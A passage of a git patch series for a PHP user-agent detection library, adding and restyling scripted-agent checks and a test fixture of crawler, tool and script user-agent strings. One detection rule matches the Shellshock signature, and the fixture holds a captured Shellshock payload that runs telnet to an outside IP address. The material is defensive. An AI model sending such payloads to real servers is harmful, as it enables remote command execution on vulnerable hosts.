"Go-http-client") !== false) - { + if (stripos(self::$userAgentString, "Go-http-client") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOLANG); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://golang.org/"); @@ -567,8 +536,7 @@ public static function checkRobotGoLang() */ public static function checkRobotPerl() { - if (stripos(self::$userAgentString, "libwww-perl/") !== false) - { + if (stripos(self::$userAgentString, "libwww-perl/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PERL); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.perl.org/"); @@ -584,8 +552,7 @@ public static function checkRobotPerl() */ public static function checkRobotWget() { - if (stripos(self::$userAgentString, "Wget/") !== false) - { + if (stripos(self::$userAgentString, "Wget/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::WGET); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://www.gnu.org/software/wget/"); @@ -601,8 +568,7 @@ public static function checkRobotWget() */ public static function checkRobotZGrab() { - if (stripos(self::$userAgentString, "zgrab/") !== false) - { + if (stripos(self::$userAgentString, "zgrab/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ZGRAB); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://github.com/zmap/zgrab"); @@ -618,8 +584,7 @@ public static function checkRobotZGrab() */ public static function checkRobotJava() { - if (stripos(self::$userAgentString, "Java/") !== false) - { + if (stripos(self::$userAgentString, "Java/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::JAVA); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.java.com/en/"); @@ -635,8 +600,7 @@ public static function checkRobotJava() */ public static function checkRobotShellshock() { - if 
(stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) - { + if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SHELLSHOCK); self::$scriptedAgent->setType(ScriptedAgent::EXPLOIT); self::$scriptedAgent->setInfoURL("https://blog.cloudflare.com/inside-shellshock/"); @@ -652,8 +616,7 @@ public static function checkRobotShellshock() */ public static function checkRobotBrowershots() { - if (stripos(self::$userAgentString, "Browsershots") !== false) - { + if (stripos(self::$userAgentString, "Browsershots") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BROWSERSHOTS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://browsershots.org/"); @@ -669,8 +632,7 @@ public static function checkRobotBrowershots() */ public static function checkRobotWhois() { - if (stripos(self::$userAgentString, "who.is bot") !== false) - { + if (stripos(self::$userAgentString, "who.is bot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::WHOIS); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.who.is/"); @@ -686,8 +648,7 @@ public static function checkRobotWhois() */ public static function checkRobotMageReport() { - if (stripos(self::$userAgentString, "MageReport") !== false) - { + if (stripos(self::$userAgentString, "MageReport") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MAGEREPORT); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.magereport.com/"); @@ -703,8 +664,7 @@ public static function checkRobotMageReport() */ public static function checkRobotAdbeat() { - if (stripos(self::$userAgentString, "adbeat.com") !== false) - { + if (stripos(self::$userAgentString, "adbeat.com") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ADBEAT); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); 
self::$scriptedAgent->setInfoURL("https://www.adbeat.com/operation_policy"); @@ -720,8 +680,7 @@ public static function checkRobotAdbeat() */ public static function checkRobotSocialrank() { - if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) - { + if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SOCIALRANK); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://socialrank.io/about"); @@ -737,8 +696,7 @@ public static function checkRobotSocialrank() */ public static function checkRobotGlutenFree() { - if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) - { + if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GLUTENFREE); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://glutenfreepleasure.com/"); @@ -754,8 +712,7 @@ public static function checkRobotGlutenFree() */ public static function checkRobotProximic() { - if (stripos(self::$userAgentString, "proximic;") !== false) - { + if (stripos(self::$userAgentString, "proximic;") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PROXIMIC); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.proximic.com/info/spider.php"); @@ -771,8 +728,7 @@ public static function checkRobotProximic() */ public static function checkRobotUbermetrics() { - if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) - { + if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) { self::$scriptedAgent->setName(ScriptedAgent::UBERMETRICS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.ubermetrics-technologies.com/"); @@ -788,8 +744,7 @@ public static function checkRobotUbermetrics() */ public static function checkRobotVerisign() { - if 
(stripos(self::$userAgentString, "ips-agent") !== false) - { + if (stripos(self::$userAgentString, "ips-agent") !== false) { self::$scriptedAgent->setName(ScriptedAgent::VERISIGN); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://www.spambotsecurity.com/forum/viewtopic.php?f=7&t=1453"); From ea8a4c3e395caa0179106ec56fe11ce7d35c4388 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 19:52:54 +0100 Subject: [PATCH 12/19] Add tests for the scripted agent detection --- .../Tests/ScriptedAgentDetectorTest.php | 10 +- .../Tests/ScriptedAgentTest.php | 6 +- .../Tests/_files/UserAgentStrings.xml | 737 +++++++++++++++++- .../Tests/_includes/UserAgentString.php | 46 ++ .../Tests/_includes/UserAgentStringMapper.php | 43 +- 5 files changed, 829 insertions(+), 13 deletions(-) diff --git a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php index 6f015ff..91a5d08 100644 --- a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php +++ b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php @@ -3,11 +3,17 @@ namespace Sinergi\BrowserDetector\Tests; use PHPUnit_Framework_TestCase; +use Sinergi\BrowserDetector\ScriptedAgent; class ScriptedAgentDetectorTest extends PHPUnit_Framework_TestCase { - public function testExample() + public function testDetect() { - $this->assertNotFalse(false); + $userAgentStringCollection = UserAgentStringMapper::map(); + foreach ($userAgentStringCollection as $userAgentString) { + $agent = new ScriptedAgent($userAgentString->getString()); + $this->assertSame($userAgentString->getScriptedAgent(), $agent->getName()); + $this->assertSame($userAgentString->getScriptedAgentType(), $agent->getType()); + } } } diff --git a/tests/BrowserDetector/Tests/ScriptedAgentTest.php b/tests/BrowserDetector/Tests/ScriptedAgentTest.php index 63999b9..fb03756 100644 --- a/tests/BrowserDetector/Tests/ScriptedAgentTest.php +++ 
b/tests/BrowserDetector/Tests/ScriptedAgentTest.php @@ -3,11 +3,13 @@ namespace Sinergi\BrowserDetector\Tests; use PHPUnit_Framework_TestCase; +use Sinergi\BrowserDetector\ScriptedAgent; class ScriptedAgentTest extends PHPUnit_Framework_TestCase { - public function testExample() + public function testDetect() { - $this->assertNotFalse(false); + $agent = new ScriptedAgent(); + $this->assertSame(ScriptedAgent::UNKNOWN, $agent->getName()); } } diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index 99d8945..a342b23 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -3,11 +3,13 @@ Opera - 21.0.1432.67 + 21.0.1432.67 OS X 10.9.3 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36 OPR/21.0.1432.67 @@ -20,6 +22,8 @@ 3.2 iPad unknown + unknown + unknown Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc @@ -32,6 +36,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 @@ -44,6 +50,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36 @@ -56,6 +64,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 YaBrowser/15.6.2311.3451 (beta) Yowser/2.0 Safari/537.36 @@ -68,6 +78,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) 
@@ -80,6 +92,8 @@ 10.10 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 @@ -91,6 +105,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) OPiOS/10.1.1.92212 Mobile/12B440 Safari/9537.53 @@ -103,6 +119,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/12B440 Safari/600.1.4 @@ -115,6 +133,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136 @@ -127,6 +147,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 @@ -138,6 +160,8 @@ 7 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Vivaldi/1.0.83.38 Safari/537.36 @@ -149,6 +173,8 @@ 47.0.2526.80 unknown unknown + unknown + unknown Mozilla/5.0 (X11; CrOS x86_64 7520.62.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 @@ -160,6 +186,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -171,6 +199,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -182,6 +212,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -193,6 +225,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; 
Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -204,6 +238,8 @@ 8 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7 @@ -215,6 +251,8 @@ unknown unknown unknown + unknown + unknown Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5 @@ -226,6 +264,8 @@ 10.0.9.2372 unknown unknown + unknown + unknown Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.0.9.2372 Mobile Safari/537.10+ @@ -237,6 +277,8 @@ 10 Lumia 640 LTE unknown + unknown + unknown Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 @@ -259,6 +301,8 @@ 7.1.0.523 unknown unknown + unknown + unknown Mozilla/5.0 (BlackBerry; U; BlackBerry 9380; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.523 Mobile Safari/534.11+ @@ -270,9 +314,700 @@ 5.1.1 Samsung SM-G360T1 unknown + unknown + unknown Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G360T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 + + Safari + unknown + Linux + unknown + unknown + unknown + wkhtmltopdf + Tool + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf-amd64 Safari/534.34 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Baidu + Spider + + Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + Baiduspider+(+http://www.baidu.com/search/spider_jp.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + BaiDuSpider + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google + 
Spider + + Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot/2.1 (+http://www.google.com/bot.html) + + + + Chrome + 41.0.2272.96 + Android + 6.0.1 + unknown + unknown + Google + Spider + + ​Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-News + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Image/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Video/1.0 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mozilla/5.0 (compatible; Mediapartners-Google/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mediapartners-Google + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google (+http://www.google.com/adsbot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google-Mobile-Apps + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Yahoo! Slurp + Spider + + Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Spider + + Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot/2.0b (+http://search.msn.com/msnbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot-media/1.1 (+http://search.msn.com/msnbot.htm) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Ad bots + + Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Bing + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b + + + + unknown + unknown + unknown + unknown + unknown + unknown + W3C Validator + Tool + + W3C_Validator/1.0 libwww-perl/0.40 + + + + Safari + 8.0 + iOS + 8.1 + iPhone + unknown + Yandex + Spider + + Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexBot/3.0; +http://yandex.com/bots) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Gluten Free + Survey + + Mozilla/5.0 (compatible; Gluten Free Crawler/1.0; +http://glutenfreepleasure.com/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Twitter + Preview + + Twitterbot/1.0 + + + + Safari + 8.0.2 + OS X + 10.10.1 + unknown + unknown + Apple + Spider + + Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Paper.li + Spider + + Mozilla/5.0 (compatible; PaperLiBot/2.1; http://support.paper.li/entries/20023257-what-is-paper-li) + + + + unknown + unknown + unknown + unknown + unknown + unknown + SocialRank.io + Survey + + SocialRankIOBot; 
http://socialrank.io/about + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ahrefs.com Backlink Research Tool + Survey + + Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Majestic12 + Spider + + MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+) + + + + unknown + unknown + unknown + unknown + unknown + unknown + LiveLap + Spider + + LivelapBot/0.2 (http://site.livelap.com/crawler) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Skype + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 + + + + Safari + unknown + Linux + unknown + unknown + unknown + AdBeat + Ad bots + + Mozilla/5.0 (X11; U; Linux x86; %lang_code%) adbeat.com/policy Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 AppleWebKit/532.4 Safari/532.4 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Facebook + Preview + + facebookexternalhit/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + WEBDAV + Tool + + WEBDAV Client + + + + Firefox + 6.0 + Windows + 7 + unknown + unknown + Google Favicon + Scripted Agent + + Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon + + + + unknown + unknown + unknown + unknown + unknown + unknown + MetaURI + Survey + + MetaURI API/2.0 metauri.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + TLSProbe + Tool + + TLSProbe/1.0 (+https://scan.trustnet.venafi.com/) + + + + Safari + unknown + Linux + unknown + unknown + unknown + Scoop.it + Spider + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) imgsizer Safari/537.21 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Netcraft SSL + Survey + + Netcraft SSL Server Survey - contact info@netcraft.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + Curl + Scripted Agent + + curl/7.37.0 + + + + unknown + unknown + unknown + unknown + unknown + 
unknown + Python + Scripted Agent + + python-urllib/12.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + GoLang + Scripted Agent + + Go-http-client/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Perl + Scripted Agent + + libwww-perl/1.0 + + + + Firefox + 3.5.3 + Linux + unknown + unknown + unknown + Verisign + Survey + + Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3 + + + + unknown + unknown + Linux + unknown + unknown + unknown + Wget + Tool + + Wget/1.13.4 (linux-gnu) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + ZGrab + Tool + + Mozilla/5.0 zgrab/0.3 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Java + Scripted Agent + + Java/1.6.0_14 + + + + unknown + unknown + unknown + unknown + unknown + unknown + ShellShock exploit + Exploit attempt + + () { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22 () { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq + + + + unknown + unknown + unknown + unknown + unknown + unknown + BrowserShots + Survey + + BrowserShots + + + + unknown + unknown + unknown + unknown + unknown + unknown + Who.is + Spider + + Who.is Bot + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + MageReport + Survey + + Mozilla/5.0 (www.magereport.com/page/about) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ubermetrics Technologies + Survey + + Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Proximic + Spider + + Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php) + + diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentString.php b/tests/BrowserDetector/Tests/_includes/UserAgentString.php index 919e18e..4bdcfc3 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentString.php +++ 
b/tests/BrowserDetector/Tests/_includes/UserAgentString.php @@ -39,6 +39,16 @@ class UserAgentString */ private $string; + /** + * @var string + */ + private $scriptedAgent; + + /** + * @var string + */ + private $scriptedAgentType; + /** * @return string */ @@ -178,4 +188,40 @@ public function setDeviceVersion($deviceVersion) return $this; } + + /** + * @return string + */ + public function getScriptedAgent() + { + return $this->scriptedAgent; + } + + /** + * @param string $scriptedAgent + * + * @return string + */ + public function setScriptedAgent($scriptedAgent) + { + $this->scriptedAgent = $scriptedAgent; + } + + /** + * @return string + */ + public function getScriptedAgentType() + { + return $this->scriptedAgentType; + } + + /** + * @param string $scriptedAgentType + * + * @return string + */ + public function setScriptedAgentType($scriptedAgentType) + { + $this->scriptedAgentType = $scriptedAgentType; + } } diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index 08ff5e6..ae62aac 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -13,16 +13,43 @@ public static function map() { $collection = array(); $xml = new SimpleXmlElement(file_get_contents(FILES . DIRECTORY_SEPARATOR . 
'UserAgentStrings.xml')); + foreach ($xml->strings->string as $string) { - $string = $string->field; $userAgentString = new UserAgentString(); - $userAgentString->setBrowser((string)$string[0]); - $userAgentString->setBrowserVersion((string)$string[1]); - $userAgentString->setOs((string)$string[2]); - $userAgentString->setOsVersion((string)$string[3]); - $userAgentString->setDevice((string)$string[4]); - $userAgentString->setDeviceVersion((string)$string[5]); - $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)$string[6])); + foreach($string->children() as $child) + { + $attributes = $child->attributes(); + switch($attributes['name']) + { + case "browser": + $userAgentString->setBrowser((string)$child[0]); + break; + case "version": + $userAgentString->setBrowserVersion((string)$child[0]); + break; + case "os": + $userAgentString->setOs((string)$child[0]); + break; + case "os_version": + $userAgentString->setOsVersion((string)$child[0]); + break; + case "device": + $userAgentString->setDevice((string)$child[0]); + break; + case "device_version": + $userAgentString->setDeviceVersion((string)$child[0]); + break; + case "scripted_agent": + $userAgentString->setScriptedAgent((string)$child[0]); + break; + case "scripted_agent_type": + $userAgentString->setScriptedAgentType((string)$child[0]); + break; + case "string": + $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)(string)$child[0])); + break; + } + } $collection[] = $userAgentString; } From 301f64c4b9493b4f8e7208d161086108921cb351 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 20:16:02 +0100 Subject: [PATCH 13/19] Fix code style --- .../Tests/_includes/UserAgentStringMapper.php | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index ae62aac..7aba697 100644 --- 
a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -16,11 +16,9 @@ public static function map() foreach ($xml->strings->string as $string) { $userAgentString = new UserAgentString(); - foreach($string->children() as $child) - { + foreach ($string->children() as $child) { $attributes = $child->attributes(); - switch($attributes['name']) - { + switch ($attributes['name']) { case "browser": $userAgentString->setBrowser((string)$child[0]); break; From 80b9c26e9983391189ae63d861d11f199d42c00d Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Tue, 11 Apr 2017 21:55:33 -0400 Subject: [PATCH 14/19] Few style changes --- src/Browser.php | 105 +++++++++++--------------- src/BrowserDetector.php | 2 - src/ScriptedAgentDetector.php | 135 ++++++++++++---------------------- 3 files changed, 86 insertions(+), 156 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index e2e2e4c..0ba35ec 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -89,7 +89,6 @@ class Browser /** * @param null|string|UserAgent $userAgent - * * @throws \Sinergi\BrowserDetector\InvalidArgumentException */ public function __construct($userAgent = null) @@ -107,13 +106,11 @@ public function __construct($userAgent = null) * Set the name of the Browser. * * @param string $name - * * @return $this */ public function setName($name) { $this->name = (string)$name; - return $this; } @@ -135,7 +132,6 @@ public function getName() * Check to see if the specific browser is valid. * * @param string $name - * * @return bool */ public function isBrowser($name) @@ -147,13 +143,11 @@ public function isBrowser($name) * Set the version of the browser. 
* * @param string $version - * * @return $this */ public function setVersion($version) { $this->version = (string)$version; - return $this; } @@ -181,69 +175,61 @@ public function getVersion() public function detectScriptedAgent() { $ua = $this->getUserAgent()->getUserAgentString(); - if (stripos($ua, 'bot') !== FALSE || - stripos($ua, 'spider') !== FALSE || - stripos($ua, 'crawler') !== FALSE || - stripos($ua, 'preview') !== FALSE || - stripos($ua, 'slurp') !== FALSE || - stripos($ua, 'facebookexternalhit') !== FALSE || - stripos($ua, 'mediapartners') !== FALSE || - stripos($ua, 'google-adwords') !== FALSE || - stripos($ua, 'adxvastfetcher') !== FALSE || - stripos($ua, 'adbeat') !== FALSE || - stripos($ua, 'google favicon') !== FALSE || - stripos($ua, 'webdav client') !== FALSE || - stripos($ua, 'metauri api') !== FALSE || - stripos($ua, 'tlsprobe') !== FALSE || - stripos($ua, 'wpif') !== FALSE || - stripos($ua, 'imgsizer') !== FALSE || - stripos($ua, 'netcraft ssl server survey') !== FALSE || - stripos($ua, 'curl/') !== FALSE || - stripos($ua, 'go-http-client/') !== FALSE || - stripos($ua, 'python') !== FALSE || - stripos($ua, 'libwww') !== FALSE || - stripos($ua, 'wget/') !== FALSE || - stripos($ua, 'zgrab/') !== FALSE || - stripos($ua, 'Java/') !== FALSE || - stripos($ua, '() { :;}; /bin/bash -c') !== FALSE || - stripos($ua, 'browsershots') !== FALSE || - stripos($ua, 'magereport') !== FALSE || - stripos($ua, 'ubermetrics-technologies') !== FALSE || - stripos($ua, 'W3C') !== FALSE || - stripos($ua, 'Validator') !== FALSE || - stripos($ua, 'Jigsaw/') !== FALSE || - stripos($ua, 'bing') !== FALSE || - stripos($ua, 'msn') !== FALSE || - stripos($ua, 'Google Web Preview') !== FALSE || - stripos($ua, 'ips-agent') !== FALSE || - (stripos($ua, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) //ICQ Preview - ) - { + if (stripos($ua, 'bot') !== false || + stripos($ua, 
'spider') !== false || + stripos($ua, 'crawler') !== false || + stripos($ua, 'preview') !== false || + stripos($ua, 'slurp') !== false || + stripos($ua, 'facebookexternalhit') !== false || + stripos($ua, 'mediapartners') !== false || + stripos($ua, 'google-adwords') !== false || + stripos($ua, 'adxvastfetcher') !== false || + stripos($ua, 'adbeat') !== false || + stripos($ua, 'google favicon') !== false || + stripos($ua, 'webdav client') !== false || + stripos($ua, 'metauri api') !== false || + stripos($ua, 'tlsprobe') !== false || + stripos($ua, 'wpif') !== false || + stripos($ua, 'imgsizer') !== false || + stripos($ua, 'netcraft ssl server survey') !== false || + stripos($ua, 'curl/') !== false || + stripos($ua, 'go-http-client/') !== false || + stripos($ua, 'python') !== false || + stripos($ua, 'libwww') !== false || + stripos($ua, 'wget/') !== false || + stripos($ua, 'zgrab/') !== false || + 